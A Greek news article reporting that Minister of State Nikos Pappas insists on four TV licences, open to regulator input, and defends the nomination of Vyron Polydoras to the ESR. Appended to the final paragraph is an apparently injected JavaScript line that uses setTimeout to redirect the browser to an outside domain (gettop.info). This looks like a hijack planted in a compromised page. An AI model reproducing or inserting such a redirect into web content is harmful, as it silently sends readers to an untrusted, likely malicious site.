Ο Νίκος Παππάς επιμένει στον αριθμό «4» για τις τηλεοπτικές άδειες (ΒΙΝΤΕΟ)

0
2

 

Η κυβέρνηση επιμένει στον αριθμό 4 για τις τηλεοπτικές άδειες, που σημαίνει πως επιμένει στο να υπάρξουν 4 τηλεοπτικά κανάλια, αποκάλυψε ο υπουργός Επικρατείας Νίκος Παππάς.

Μιλώντας στον τηλεοπτικό σταθμό Epsilon και τον Νίκο Ευαγγελάτο ο κ.Παππάς ,μεταξύ άλλων, τόνισε πως η κυβέρνηση είναι ανοιχτή στο να δεχθεί το ΕΣΡ όταν συγκροτηθεί να έχει σύμφωνη γνώμη για τον αριθμό των τηλεοπτικών αδειών.

Όπως ξεκαθάρισε ο υπουργός Επικρατείας, η κυβέρνηση μέσω του νομοθετικού της έργου θα προσαρμοστεί στην απόφαση του Συμβουλίου της Επικρατείας «ακόμα κι αν δεν μας αρέσει”, ενώ αναφορικά με τις αιτιάσεις της αντιπολίτευσης που ζητούν κατάργηση του νόμου, τόνισε πως εάν καταργηθεί η συγκεκριμένη τροπολογία υπάρχει κίνδυνος αξιώσεων από τους υπερθεματιστές που έλαβαν μέρος στη διαδικασία του διαγωνισμού και έχουν καταθέσει ήδη τα χρήματά τους.

Ο κ. Παππάς διέκρινε σημάδια σύγκλισης για τη συγκρότηση του ΕΣΡ χαιρετίζοντας την απόφαση της Νέας Δημοκρατίας να προτείνει ένα πρόσωπο για το προεδρείο του ΕΣΡ, χωρίς ωστόσο να σχολιάσει το πρόσωπο. Μάλιστα, όπως είπε η πρόταση της Νέας Δημοκρατίας στέλνει ένα μήνυμα και στα υπόλοιπα κόμματα πως υπάρχουν περιθώρια συναίνεσης.

Κληθείς να σχολιάσει την πρωτοφανή σε ύφος δήλωση της κυβερνητικής εκπροσώπου, Όλγας Γεροβασίλη, ο Νίκος Παππάς υπεραμύνθηκε τη δήλωσή της λέγοντας πως έκανε μία δήλωση για την κυβέρνηση όπως έπρεπε να γίνει.

Επίσης ο κ. Παππάς υπεραμύνθηκε της απόφασης της κυβέρνησης να προτείνει για το προεδρείο του ΕΣΡ τον Βύρωνα Πολύδωρα, λέγοντας πως καλώς προτάθηκε και υπήρξε η προσδοκία πως θα υπάρξει σύγκλιση στο πρόσωπό του. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here